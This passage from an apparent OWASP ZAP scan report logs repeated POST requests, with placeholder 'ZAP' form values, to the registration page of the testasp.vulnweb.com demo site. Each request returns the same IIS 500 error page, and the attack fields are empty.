tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
